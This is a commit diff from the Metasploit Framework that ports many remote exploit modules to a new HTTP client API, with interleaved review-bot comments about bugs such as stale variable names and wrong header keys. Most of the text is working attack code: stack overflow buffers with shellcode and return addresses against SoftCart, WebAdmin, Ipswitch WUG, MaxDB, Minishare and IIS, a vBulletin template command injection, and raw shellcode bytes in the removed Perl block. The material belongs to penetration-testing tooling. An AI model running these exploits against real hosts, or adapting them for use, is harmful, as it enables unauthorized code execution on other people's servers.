Integration of the new HTTP Client API
git-svn-id: file:///home/svn/framework3/trunk@4241 4d416f70-5f16-0410-b530-b9f4589650da
parent
e60e7bede3
commit
b221af7791
@ -59,8 +59,7 @@ class Exploits::Bsdi::Softcart::Softcart01 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def brute_exploit(address)
|
||||
print_status("Trying #{"%.8x" % address['Ret']}...")
|
||||
|
||||
|
||||
buffer =
|
||||
"MAA+scstoreB" +
|
||||
rand_text_alphanumeric(512) +
|
||||
|
@ -69,227 +68,14 @@ class Exploits::Bsdi::Softcart::Softcart01 < Msf::Exploit::Remote
|
|||
[address['Ret'] + payload.encoded.length].pack('V') +
|
||||
payload.encoded
|
||||
|
||||
connect('global' => true)
|
||||
|
||||
req = client.request(
|
||||
'uri' => datastore['URI'] + "?" + buffer)
|
||||
|
||||
client.send_request(req)
|
||||
print_status("Trying #{"%.8x" % address['Ret']}...")
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['URI'],
|
||||
'query' => buffer
|
||||
}, 5)
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
=begin
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be redistributed
|
||||
# according to the licenses defined in the Authors field below. In the
|
||||
# case of an unknown or missing license, this file defaults to the same
|
||||
# license as the core Framework (dual GPLv2 and Artistic). The latest
|
||||
# version of the Framework can always be obtained from metasploit.com.
|
||||
##
|
||||
|
||||
package Msf::Exploit::mercantec_softcart;
|
||||
|
||||
use strict;
|
||||
use base "Msf::Exploit";
|
||||
|
||||
my $advanced =
|
||||
{
|
||||
'StackBottom' => [ '', 'Start address for stack ret.' ],
|
||||
'StackTop' => [ '', 'Stop address for stack ret.' ],
|
||||
'StackStep' => [ 0, 'Number of bytes to increment between steps.' ],
|
||||
'BruteWait' => [ 0, 'Number of seconds to wait between steps.' ],
|
||||
};
|
||||
|
||||
my $info =
|
||||
{
|
||||
'Name' => 'Mercantec SoftCart CGI Overflow',
|
||||
'Version' => '$Revision: 3110 $',
|
||||
'Authors' =>
|
||||
[
|
||||
'skape <mmiller [at] hick.org>',
|
||||
'trew <trew [at] exploit.us>'
|
||||
],
|
||||
|
||||
'Description' =>
|
||||
qq{
|
||||
This is an exploit for an undisclosed buffer overflow
|
||||
in the SoftCart.exe CGI as shipped with Mercantec's shopping
|
||||
cart software. It is possible to execute arbitrary code by
|
||||
passing a malformed CGI parameter in an HTTP GET request.
|
||||
This issue is known to affect SoftCart version 4.00b.
|
||||
},
|
||||
|
||||
'Arch' => [ 'x86' ],
|
||||
'OS' => [ 'bsdi' ],
|
||||
'Priv' => 0,
|
||||
|
||||
'UserOpts' =>
|
||||
{
|
||||
'RHOST' => [ 1, 'ADDR', 'The target HTTP server address' ],
|
||||
'RPORT' => [ 1, 'PORT', 'The target HTTP server port', 80 ],
|
||||
'VHOST' => [ 1, 'DATA', 'The target HTTP virtual host', 'auto' ],
|
||||
'URI' => [ 1, 'DATA', 'The target CGI URI', '/cgi-bin/SoftCart.exe' ],
|
||||
},
|
||||
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1000, # tons
|
||||
'MinNops' => 16,
|
||||
'BadChars'=> "\x09\x0a\x0b\x0c\x0d\x20\x27\x5c\x3c\x3e" .
|
||||
"\x3b\x22\x60\x7e\x24\x5e\x2a\x26\x7c\x7b" .
|
||||
"\x7d\x28\x29\x3f\x5d\x5b\x00",
|
||||
'PrependEncoder' => "\x83\xec\x7f", # sub $0x7f, %esp
|
||||
},
|
||||
|
||||
'Refs' =>
|
||||
[
|
||||
['OSVDB', '9011'],
|
||||
['MIL', '38'],
|
||||
],
|
||||
|
||||
'DefaultTarget' => -1,
|
||||
|
||||
'Targets' =>
|
||||
[
|
||||
|
||||
# Name Bottom/Ret Top
|
||||
[ 'BSDi/4.3 Bruteforce', 0xefbf3000, 0xefbffffc ],
|
||||
[ 'BSDi/4.3', 0xefbf4b8e, 0x0 ],
|
||||
],
|
||||
|
||||
'Keys' => ['softcart'],
|
||||
|
||||
'DisclosureDate' => 'Aug 19 2004',
|
||||
};
|
||||
|
||||
sub new
|
||||
{
|
||||
my $class = shift;
|
||||
my $self;
|
||||
|
||||
$self = $class->SUPER::new(
|
||||
{
|
||||
'Info' => $info,
|
||||
'Advanced' => $advanced,
|
||||
},
|
||||
@_);
|
||||
|
||||
return $self;
|
||||
}
|
||||
|
||||
#
|
||||
# We must fork our child before doing fun stuff.
|
||||
#
|
||||
sub PayloadPrepend
|
||||
{
|
||||
my $self = shift;
|
||||
|
||||
return "\x6a\x02\x58\x50\x9a\x00\x00\x00\x00\x07\x00" .
|
||||
"\x85\xd2\x75\x0a\x31\xc0\x40\x9a\x00\x00\x00" .
|
||||
"\x00\x07\x00";
|
||||
}
|
||||
|
||||
sub Exploit
|
||||
{
|
||||
my $self = shift;
|
||||
my $targetIdx = $self->GetVar('TARGET');
|
||||
my $payload = $self->GetVar('EncodedPayload');
|
||||
my $shellcode = $payload->Payload;
|
||||
my $target = $self->Targets->[$targetIdx];
|
||||
my $ret = $target->[1];
|
||||
my $valid;
|
||||
|
||||
$self->PrintLine('[*] Trying exploit target ' . $target->[0]);
|
||||
|
||||
if ($target->[0] =~ /Bruteforce/)
|
||||
{
|
||||
my $stackTop = hex($self->GetLocal('StackTop'));
|
||||
my $stackBottom = hex($self->GetLocal('StackBottom'));
|
||||
my $stackStep = $self->GetLocal('StackStep');
|
||||
my $wait = $self->GetLocal('BruteWait');
|
||||
|
||||
$stackBottom = $target->[1] if ($stackBottom == 0);
|
||||
$stackTop = $target->[2] if ($stackTop == 0);
|
||||
$stackStep = $payload->NopsLength if ($stackStep == 0);
|
||||
|
||||
$self->PrintLine(sprintf('[*] Brute forcing %.8x => %.8x (step %d)...',
|
||||
$stackBottom, $stackTop, $stackStep));
|
||||
|
||||
# Loop through addresses, incrementing by stackStep each interval
|
||||
for ($ret = $stackBottom, $valid = $ret + length($shellcode);
|
||||
$ret < $stackTop;
|
||||
$ret = $self->StepAddress(Address => $ret, StepSize => $stackStep, Direction => 1),
|
||||
$valid = $self->StepAddress(Address => $valid, StepSize => $stackStep, Direction => 1))
|
||||
{
|
||||
|
||||
# Wrap valid around if it goes past the top
|
||||
$valid = $stackBottom if ($valid >= $stackTop);
|
||||
|
||||
$self->PrintLine(sprintf("[*] Trying %.8x...", $ret));
|
||||
|
||||
last if (not defined($self->transmitExploit(target => $target,
|
||||
shellcode => $shellcode, ret => $ret, valid => $valid)));
|
||||
|
||||
sleep($wait);
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
$valid = $ret + length($shellcode);
|
||||
|
||||
$self->transmitExploit(target => $target,
|
||||
shellcode => $shellcode, ret => $ret, valid => $valid);
|
||||
}
|
||||
}
|
||||
|
||||
sub transmitExploit
|
||||
{
|
||||
my $self = shift;
|
||||
my ($target, $shellcode, $ret, $valid) = @{{@_}}{qw/target shellcode ret valid/};
|
||||
my $targetHost = $self->GetVar('RHOST');
|
||||
my $targetPort = $self->GetVar('RPORT');
|
||||
my $vhost = $self->GetVar('VHOST');
|
||||
my $uri = $self->GetVar('URI');
|
||||
my $bof;
|
||||
my $s;
|
||||
|
||||
$vhost = $targetHost if (not defined($vhost) or $vhost eq 'auto');
|
||||
|
||||
# Build payload
|
||||
$bof = "MAA+scstoreB";
|
||||
$bof .= "A" x (524 - length($bof));
|
||||
$bof .= pack("V", $ret);
|
||||
$bof .= "MSF!";
|
||||
$bof .= pack("V", $valid);
|
||||
$bof .= $shellcode;
|
||||
|
||||
my $s = Msf::Socket::Tcp->new
|
||||
(
|
||||
'PeerAddr' => $targetHost,
|
||||
'PeerPort' => $targetPort,
|
||||
'LocalPort' => $self->GetVar('CPORT'),
|
||||
'SSL' => $self->GetVar('SSL'),
|
||||
);
|
||||
if ($s->IsError) {
|
||||
$self->PrintError;
|
||||
return;
|
||||
}
|
||||
|
||||
# << pow! >>
|
||||
$s->Send("GET $uri?$bof HTTP/1.0\r\n" .
|
||||
"Host: $vhost\r\n" .
|
||||
"\r\n");
|
||||
|
||||
return 1;
|
||||
}
|
||||
|
||||
1;
|
||||
|
||||
=end
|
||||
|
||||
|
||||
end
|
||||
end
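Review bot: `res` is assigned from `send_request_raw` in brute_exploit but never read on the new side; the same unused assignment appears in the ALTN_WebAdmin exploit, Ipswitch_Wug, TrackerCam exploit, IIS_NSIISLOG exploit_target, RSA_WebAgent exploit and IIS_W3WHO exploit hunks. Either drop the assignment, `send_request_raw({ 'uri' => datastore['URI'], 'query' => buffer }, 5)`, as the ApacheChunkedEncoding, IaWebmail, MaxDB and Minishare hunks do, or act on the result (a nil response after a probe is at least worth a `print_status`). brute_exploit's body begins in the first hunk of this file; the `=begin`/`=end` block removed in the second hunk is history and needs no further action.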
|
||||
|
|
|
@ -46,10 +46,12 @@ class Exploits::Multi::Realserver::Describe < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
response = request(
|
||||
res = send_request_raw({
|
||||
'method' => 'OPTIONS',
|
||||
'proto' => 'RTSP/1.0',
|
||||
'uri' => '/')
|
||||
'proto' => 'RTSP',
|
||||
'version' => '1.0',
|
||||
'uri' => '/'
|
||||
}, 5)
|
||||
|
||||
if response and response['Server']
|
||||
print_status("Found RTSP: #{response['Server']}")
|
||||
|
@ -65,10 +67,12 @@ class Exploits::Multi::Realserver::Describe < Msf::Exploit::Remote
|
|||
|
||||
encoded = payload.encoded.gsub(/./) { |char| "%%%.2x" % char[0] }
|
||||
|
||||
request(
|
||||
res = send_request_raw({
|
||||
'method' => 'DESCRIBE',
|
||||
'proto' => 'RTSP/1.0',
|
||||
'uri' => "/" + ("../" * 560) + "\xcc\xcc\x90\x90" + encoded + ".smi")
|
||||
'proto' => 'RTSP',
|
||||
'version' => '1.0',
|
||||
'uri' => "/" + ("../" * 560) + "\xcc\xcc\x90\x90" + encoded + ".smi"
|
||||
}, 5)
|
||||
|
||||
handler
|
||||
end
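Review bot: check() still reads `response` in `if response and response['Server']` and in the `print_status("Found RTSP: ...")` below it, but the new call assigns its result to `res`, so `response` is undefined at that point and raises NameError unless a method of that name exists on the module. Rename the two uses to `res`, or keep the original name on the new line: `response = send_request_raw({`. The IIS_NSIISLOG check hunk has the same stale-name defect in the other direction: it assigns `r = send_request_raw(...)` and then tests `if (res and res.body =~ /NetShow ISAPI/)`, so that check can never report Detected.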
|
||||
|
|
|
@ -16,7 +16,7 @@ class Exploits::Unix::Http::PhpvBulletinTemplateName < Msf::Exploit::Remote
|
|||
is enabled. All versions of vBulletin prior to 3.0.7 are
|
||||
affected.
|
||||
},
|
||||
'Author' => [ 'str0ke <str0ke@milw0rm.com>', 'cazz' ],
|
||||
'Author' => [ 'str0ke <str0ke[at]milw0rm.com>', 'cazz' ],
|
||||
'License' => BSD_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' => [
|
||||
|
@ -46,22 +46,24 @@ class Exploits::Unix::Http::PhpvBulletinTemplateName < Msf::Exploit::Remote
|
|||
|
||||
deregister_options(
|
||||
'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now.
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
def go(command)
|
||||
wrapper = Rex::Text.rand_text_alphanumeric(rand(128)+32)
|
||||
|
||||
command = "echo #{wrapper};#{command};echo #{wrapper};"
|
||||
|
||||
encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
|
||||
|
||||
uri = datastore['PATH'] + "?do=page&template={${passthru(#{encoded})}}";
|
||||
|
||||
res = request({
|
||||
'uri' => datastore['PATH'],
|
||||
'method' => 'GET',
|
||||
})
|
||||
res = send_request_cgi({
|
||||
'uri' => datastore['PATH'],
|
||||
'method' => 'GET',
|
||||
'vars_get' =>
|
||||
{
|
||||
'do' => "page",
|
||||
'template' => "{${passthru(#{encoded})}}"
|
||||
}
|
||||
}, 5)
|
||||
|
||||
if (res and res.body)
|
||||
b = /#{wrapper}[\s\r\n]*(.*)[\s\r\n]*#{wrapper}/sm.match(res.body)
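Review bot: the `uri = datastore['PATH'] + "?do=page&template={${passthru(#{encoded})}}";` line above the new `send_request_cgi` call is shown once without a marker; if it survives on the new side it is now dead code, because the parameters travel in `vars_get`, and it leaves two spellings of the same template string to drift apart. Delete that line (including its stray trailing `;`), or build `vars_get` from it. go()'s body continues past the end of the hunk.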
|
||||
|
|
|
@ -67,12 +67,12 @@ class Exploits::Unix::Http::PhpXmlrpcEval < Msf::Exploit::Remote
|
|||
"</param></params>" +
|
||||
"</methodCall>";
|
||||
|
||||
res = request({
|
||||
res = send_request_cgi({
|
||||
'uri' => datastore['PATH'],
|
||||
'method' => 'POST',
|
||||
'Content-Type' => 'application/xml',
|
||||
'ctype' => 'application/xml',
|
||||
'data' => xml,
|
||||
})
|
||||
}, 5)
|
||||
|
||||
|
||||
if (res and res.body)
|
||||
|
|
|
@ -50,11 +50,9 @@ class Exploits::Windows::Http::ALTN_WebAdmin_Overflow < Msf::Exploit::Remote
|
|||
|
||||
# Identify the target based on the WebAdmin version number
|
||||
def autofilter
|
||||
c = connect
|
||||
|
||||
req = c.request({ 'uri' => '/WebAdmin.DLL' })
|
||||
res = c.send_request(req, -1)
|
||||
disconnect
|
||||
res = send_request_raw({
|
||||
'uri' => '/WebAdmin.DLL'
|
||||
}, -1)
|
||||
|
||||
if (res and res.body =~ /WebAdmin.*v(2\..*)$/)
|
||||
case $1
|
||||
|
@ -78,29 +76,28 @@ class Exploits::Windows::Http::ALTN_WebAdmin_Overflow < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
c = connect
|
||||
|
||||
user_cook = Rex::Text.rand_text_alphanumeric(2)
|
||||
post_data = 'User=' + make_nops(168) + [target.ret].pack('V') + payload.encoded
|
||||
post_data << '&Password=wtf&languageselect=en&Theme=Heavy&Logon=Sign+In'
|
||||
|
||||
req = c.request({
|
||||
'uri' => '/WebAdmin.DLL?View=Logon',
|
||||
print_status("Sending request...")
|
||||
res = send_request_cgi({
|
||||
'uri' => '/WebAdmin.DLL',
|
||||
'query' => 'View=Logon',
|
||||
'method' => 'POST',
|
||||
'content-type' => 'application/x-www-form-urlencoded',
|
||||
'cookie' => "User=#{user_cook}; Lang=en; Theme=standard",
|
||||
'data' => post_data,
|
||||
})
|
||||
'headers' =>
|
||||
{
|
||||
'Accept' => 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png',
|
||||
'Accept-Language' => 'en',
|
||||
'Accept-Charset' => 'iso-8859-1,*,utf-8'
|
||||
}
|
||||
}, 5)
|
||||
|
||||
req.headers['Accept'] = 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png'
|
||||
req.headers['Accept-Language'] = 'en'
|
||||
req.headers['Accept-Charset'] = 'iso-8859-1,*,utf-8'
|
||||
|
||||
print_status("Sending request...")
|
||||
res = c.send_request(req)
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
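Review bot: the new send_request_cgi hash in exploit() uses the key `'content-type'`, whereas the PhpXmlrpcEval hunk in this same commit converts `'Content-Type'` to `'ctype'` and both MS03_007 hunks use `'ctype'` as well; if `'ctype'` is the key the new client recognises, this POST most likely goes out without a Content-Type header, and the same key appears in the Ipswitch_Wug and IIS_NSIISLOG exploit hunks. Change it to `'ctype' => 'application/x-www-form-urlencoded',` in all three. `res` is assigned but never read; the `disconnect` kept at the end of the method predates the removal of `c = connect`, so confirm the new client expects it.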
|
||||
|
|
|
@ -230,16 +230,14 @@ class Exploits::Windows::Http::ApacheChunkedEncoding < Msf::Exploit::Remote
|
|||
print_status("Trying #{target.name} [ #{"0x%.8x" % target.ret}/#{pad} ]")
|
||||
|
||||
# Build the request
|
||||
request(
|
||||
send_request_raw({
|
||||
'uri' => '/',
|
||||
'headers' =>
|
||||
{
|
||||
'Host' => "#{vhost}:#{rport}",
|
||||
'Transfer-Encoding' => "CHUNKED"
|
||||
},
|
||||
'data' => "FFFFFFF0 " + pattern,
|
||||
'timeout' => 2
|
||||
)
|
||||
}, 2)
|
||||
|
||||
# Check the handler
|
||||
handler
|
||||
|
|
|
@ -52,12 +52,13 @@ class Exploits::Windows::Http::IaWebmail < Msf::Exploit::Remote
|
|||
def exploit
|
||||
print_status("Sending request...")
|
||||
|
||||
request(
|
||||
send_request_raw({
|
||||
'uri' =>
|
||||
"/" + ("o" * target['Length']) +
|
||||
"META" +
|
||||
[target.ret].pack('V') +
|
||||
payload.encoded)
|
||||
payload.encoded
|
||||
}, 2)
|
||||
|
||||
handler
|
||||
end
|
||||
|
|
|
@ -52,27 +52,27 @@ class Exploits::Windows::Http::Ipswitch_Wug_Maincfgret < Msf::Exploit::Remote
|
|||
def exploit
|
||||
c = connect
|
||||
|
||||
num = rand(65535).to_s
|
||||
num = rand(65535).to_s
|
||||
user_pass = "#{datastore['HTTPUSER']}" + ":" + "#{datastore['HTTPPASS']}"
|
||||
|
||||
req = "Authorization: Basic #{Rex::Text.encode_base64(user_pass)}\r\n\r\n"
|
||||
req << "page=notify&origname=&action=return&type=Beeper&instancename="
|
||||
req << Rex::Text.rand_text_alpha_upper(811, payload_badchars) + "\xeb\x06"
|
||||
req << make_nops(2) + [target.ret].pack('V') + make_nops(10) + payload.encoded
|
||||
req << "&beepernumber=&upcode=" + num + "*&downcode="+ num + "*&trapcode=" + num + "*&end=end"
|
||||
|
||||
req = c.request({
|
||||
print_status("Trying target %s..." % target.name)
|
||||
res = send_request_cgi({
|
||||
'uri' => '/_maincfgret.cgi',
|
||||
'method' => 'POST',
|
||||
'content-type' => 'application/x-www-form-urlencoded',
|
||||
'data' => req,
|
||||
})
|
||||
'headers' =>
|
||||
{
|
||||
'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}"
|
||||
}
|
||||
}, 5)
|
||||
|
||||
print_status("Trying target %s..." % target.name)
|
||||
|
||||
res = c.send_request(req)
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
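Review bot: `req` still begins with `"Authorization: Basic #{...}\r\n\r\n"` (that line is context, above the new call), while the new request now also carries the credential through `'headers'`; the POST body sent as `'data' => req` therefore starts with a raw header line and an empty line before `page=notify...`, which the CGI is unlikely to parse as form data. Start the body at the form fields instead: `req = "page=notify&origname=&action=return&type=Beeper&instancename="` and drop the header line from it. The `num = rand(65535).to_s` line is shown twice, which looks like a whitespace-only rewrite rather than a duplicate, and `res` is assigned but unused.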
|
||||
|
|
|
@ -59,8 +59,6 @@ class Exploits::Windows::Http::MaxDB_WebDBM_GET_Overflow < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
c = connect
|
||||
|
||||
# Trigger the SEH by writing past the end of the page after
|
||||
# the SEH is already overwritten. This avoids the other smashed
|
||||
# pointer exceptions and goes straight to the payload.
|
||||
|
@ -71,10 +69,12 @@ class Exploits::Windows::Http::MaxDB_WebDBM_GET_Overflow < Msf::Exploit::Remote
|
|||
buf[3647, 4] = [target.ret].pack('V')
|
||||
|
||||
print_status("Trying target address 0x%.8x..." % target.ret)
|
||||
res = c.send_request(c.request({ 'uri' => '/%' + buf }), -1)
|
||||
|
||||
send_request_raw({
|
||||
'uri' => '/%' + buf
|
||||
}, 5)
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -55,17 +55,16 @@ class Exploits::Windows::Http::Minishare_GET_Overflow < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
c = connect
|
||||
|
||||
uri = Rex::Text.rand_text_alphanumeric(target['Rets'][0])
|
||||
uri << [target['Rets'][1]].pack('V')
|
||||
uri << payload.encoded
|
||||
|
||||
print_status("Trying target address 0x%.8x..." % target['Rets'][1])
|
||||
res = c.send_request(c.request({ 'uri' => uri }), -1)
|
||||
send_request_raw({
|
||||
'uri' => uri
|
||||
}, 5)
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -57,7 +57,10 @@ class Exploits::Windows::Http::Shoutcast_Format < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
r = request('uri' => '/')
|
||||
r = send_request_raw({
|
||||
'uri' => uri
|
||||
}, 5)
|
||||
|
||||
return Exploit::CheckCode::Safe if not r
|
||||
|
||||
m = r.body.match(/Network Audio Server\/([^\s]+)\s+([^<]+)<BR/)
|
||||
|
@ -86,7 +89,9 @@ class Exploits::Windows::Http::Shoutcast_Format < Msf::Exploit::Remote
|
|||
uri << '#0100x.mp3'
|
||||
|
||||
print_status("Trying to exploit target #{target.name} 0x%.8x" % target.ret)
|
||||
res = request({ 'uri' => uri })
|
||||
send_request_raw({
|
||||
'uri' => uri
|
||||
}, 5)
|
||||
|
||||
handler
|
||||
disconnect
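Review bot: in check() the new request uses `'uri' => uri`, but `uri` is a local of exploit() (it is built in the second hunk, `uri << '#0100x.mp3'`), not of check(); the previous code requested `'/'` here. Unless the module defines a `uri` method, check() raises NameError before it sends anything. Restore `'uri' => '/'` in the check hunk. The exploit hunk looks correct; its method continues past the hunk.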
|
||||
|
|
|
@ -67,9 +67,10 @@ class Exploits::Windows::Http::TrackerCam_PHPArg_Overflow < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
c = connect
|
||||
req = c.request({ 'uri' => '/tuner/ComGetLogFile.php3?fn=../HTTPRoot/socket.php3' })
|
||||
res = c.send_request(req, -1)
|
||||
res = send_request_raw({
|
||||
'uri' => '/tuner/ComGetLogFile.php3',
|
||||
'query' => 'fn=../HTTPRoot/socket.php3'
|
||||
}, 5)
|
||||
|
||||
if (res and res.body =~ /fsockopen/)
|
||||
fp = fingerprint()
|
||||
|
@ -86,19 +87,22 @@ class Exploits::Windows::Http::TrackerCam_PHPArg_Overflow < Msf::Exploit::Remote
|
|||
seh = generate_seh_payload(target.ret)
|
||||
buf[257, seh.length] = seh
|
||||
|
||||
uri = "/tuner/TunerGuide.php3?userID=#{buf}"
|
||||
|
||||
print_status("Sending request...")
|
||||
res = c.send_request(c.request({ 'uri' => uri }), -1)
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => '/tuner/TunerGuide.php3',
|
||||
'query' => 'userID=' + buf
|
||||
}, 5)
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
def download(path)
|
||||
c = connect
|
||||
req = c.request({ 'uri' => '/tuner/ComGetLogFile.php3?fn=' + ("../" * 10) + path })
|
||||
res = c.send_request(req, -1)
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => '/tuner/ComGetLogFile.php3',
|
||||
'query' => 'fn=' + ("../" * 10) + path
|
||||
}, 5)
|
||||
|
||||
return if not (res and res.body and res.body =~ /tuner\.css/ and res.body =~ /<pre>/)
|
||||
|
||||
m = res.match(/<pre>(.*)<\/pre><\/body>/smi)
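Review bot: in download(), `m = res.match(/<pre>(.*)<\/pre><\/body>/smi)` is applied to the response object returned by the new `send_request_raw`, while the guard one line earlier tests `res.body`; unless the response class delegates `match` to its body, this raises NoMethodError exactly when a matching page comes back. Use `m = res.body.match(/<pre>(.*)<\/pre><\/body>/smi)`. The line is context and so predates this commit, but the commit rewrites the call that produces `res`, which makes it the natural place to fix. download() continues outside the hunk, and `res` in the exploit hunk is assigned but never read.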
|
||||
|
|
|
@ -75,7 +75,13 @@ class Exploits::Windows::Iis::MS03_007_WEBDAV_NTDLL < Msf::Exploit::Remote
|
|||
"<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n" +
|
||||
"<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n"
|
||||
|
||||
response = request({ 'uri' => "/#{url}", 'content-type' => 'text/xml', 'method' => 'SEARCH', 'data' => xml}, 5)
|
||||
response = send_request_cgi({
|
||||
'uri' => '/' + uri,
|
||||
'ctype' => 'text/xml',
|
||||
'method' => 'SEARCH',
|
||||
'data' => xml
|
||||
}, 5)
|
||||
|
||||
|
||||
if (response and response.body =~ /Server Error\(exception/)
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
|
@ -83,7 +89,7 @@ class Exploits::Windows::Iis::MS03_007_WEBDAV_NTDLL < Msf::Exploit::Remote
|
|||
|
||||
# Did the server stop acceping requests?
|
||||
begin
|
||||
request({ 'uri' => '/'} )
|
||||
send_request_raw({'uri' => '/'}, 5)
|
||||
rescue
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
@ -93,7 +99,7 @@ class Exploits::Windows::Iis::MS03_007_WEBDAV_NTDLL < Msf::Exploit::Remote
|
|||
|
||||
def exploit
|
||||
# verify the service is running up front
|
||||
request({'uri' => '/'})
|
||||
send_request_raw({'uri' => '/'}, 5)
|
||||
|
||||
if datastore['HTTP::junk_pipeline'] > 0
|
||||
print_status('junk pipelined exploitation requests may not work. If exploitation fails, try disabling pipelining')
|
||||
|
@ -139,10 +145,15 @@ class Exploits::Windows::Iis::MS03_007_WEBDAV_NTDLL < Msf::Exploit::Remote
|
|||
url[ 283, 2 ] = ret
|
||||
|
||||
begin
|
||||
request({ 'uri' => "/#{url}", 'content-type' => 'text/xml', 'method' => 'SEARCH', 'data' => xml}, nil)
|
||||
send_request_cgi({
|
||||
'uri' => url,
|
||||
'ctype' => 'text/xml',
|
||||
'method' => 'SEARCH',
|
||||
'data' => xml
|
||||
}, 5)
|
||||
handler
|
||||
rescue => e
|
||||
print_error("attempt failed: #{e.to_s}")
|
||||
print_error("Attempt failed: #{e.to_s}")
|
||||
end
|
||||
|
||||
1.upto(8) { |i|
|
||||
|
@ -163,7 +174,7 @@ class Exploits::Windows::Iis::MS03_007_WEBDAV_NTDLL < Msf::Exploit::Remote
|
|||
print_status('Checking if IIS is back up after a failed attempt...')
|
||||
1.upto(20) {|i|
|
||||
begin
|
||||
request({'uri' => '/'})
|
||||
send_request_raw({'uri' => '/'}, 5)
|
||||
rescue
|
||||
print_status("Connection failed (#{i} of 20)...")
|
||||
sleep(2)
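Review bot: in the exploit hunk (`@ -139,10 +145,15`) the request URI changed from `"/#{url}"` to `url`, dropping the leading slash, while the check hunk keeps it as `'/' + uri`; if `url` is built without a leading slash (its construction is outside the hunk, only `url[ 283, 2 ] = ret` is visible) the two methods now request different paths, and that change is not mentioned in the commit message. Use `'uri' => '/' + url,` in the exploit as well, or add a comment explaining why the paths differ. The check hunk also renames the local from `url` to `uri`; its definition is not in view, so confirm a `uri` local exists in check().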
|
||||
|
|
|
@ -70,23 +70,23 @@ class Exploits::Windows::Isapi::IIS_FP30REG_Chunked < Msf::Exploit::Remote
|
|||
|
||||
if (i % 3 == 0)
|
||||
print_status("Refreshing the remote DLLHost.exe process...")
|
||||
c.send_request(c.request({ 'uri' => datastore['URL'] }), -1)
|
||||
send_request_raw({
|
||||
'uri' => datastore['URL']
|
||||
}, -1)
|
||||
end
|
||||
|
||||
print_status("Trying to exploit fp30reg.dll (request #{i.to_s} of 15)")
|
||||
send_request_raw({
|
||||
'uri' => datastore['URL'],
|
||||
'method' => 'POST',
|
||||
'headers' =>
|
||||
{
|
||||
'Transfer-Encoding' => 'Chunked'
|
||||
},
|
||||
'data' => "DEAD\r\n#{pat}\r\n0\r\n"
|
||||
}, 5)
|
||||
|
||||
c.connect
|
||||
s = c.conn
|
||||
|
||||
print_status("Trying to exploit fp30reg.dll (#{i.to_s} of 15)")
|
||||
|
||||
req =
|
||||
"POST #{datastore['URL']} HTTP/1.1\r\n" +
|
||||
"Host: #{datastore['VHOST'] || datastore['RHOST']}\r\n" +
|
||||
"Transfer-Encoding: Chunked\r\n\r\n" +
|
||||
"DEAD\r\n" +
|
||||
pat + "\r\n" +
|
||||
"0\r\n"
|
||||
|
||||
s.put(req)
|
||||
sock.put(req)
|
||||
sleep(1)
|
||||
|
||||
handler
|
||||
|
@ -95,10 +95,10 @@ class Exploits::Windows::Isapi::IIS_FP30REG_Chunked < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
c = connect
|
||||
print_status("Refreshing the remote DLLHost.exe process...")
|
||||
r = c.send_request(c.request({ 'uri' => datastore['URL'] }), -1)
|
||||
disconnect
|
||||
print_status("Requesting the vulnerable ISAPI path...")
|
||||
r = send_request_raw({
|
||||
'uri' => datastore['URL']
|
||||
}, -1)
|
||||
|
||||
if (r and r.code == 501)
|
||||
return Exploit::CheckCode::Detected
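Review bot: in the exploit loop (`@ -70,23 +70,23`) the line `sock.put(req)` appears to remain on the new side after the hand-built `req` string and the `c.connect` / `s = c.conn` lines were removed, so `req` is undefined there and the POST has in any case already been sent by the `send_request_raw` call just above it; the put reads as a leftover of the old raw-socket path. Remove `sock.put(req)`, and the `sleep(1)` that paced it if it serves no other purpose. If that line is in fact on the removed side, disregard this. The loop body starts and ends outside the hunk; the check hunk is fine.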
|
||||
|
|
|
@ -58,9 +58,9 @@ class Exploits::Windows::Isapi::IIS_NSIISLOG_Overflow < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
c = connect
|
||||
req = c.request({ 'uri' => datastore['URL'] })
|
||||
res = c.send_request(req, -1)
|
||||
r = send_request_raw({
|
||||
'uri' => datastore['URL']
|
||||
}, -1)
|
||||
|
||||
if (res and res.body =~ /NetShow ISAPI/)
|
||||
return Exploit::CheckCode::Detected
|
||||
|
@ -70,9 +70,7 @@ class Exploits::Windows::Isapi::IIS_NSIISLOG_Overflow < Msf::Exploit::Remote
|
|||
|
||||
def exploit_target(target)
|
||||
|
||||
c = connect
|
||||
|
||||
buf = ''
|
||||
vars = {}
|
||||
%w{
|
||||
date time c-dns cs-uri-stem c-starttime
|
||||
x-duration c-rate c-status c-playerid c-playerversion
|
||||
|
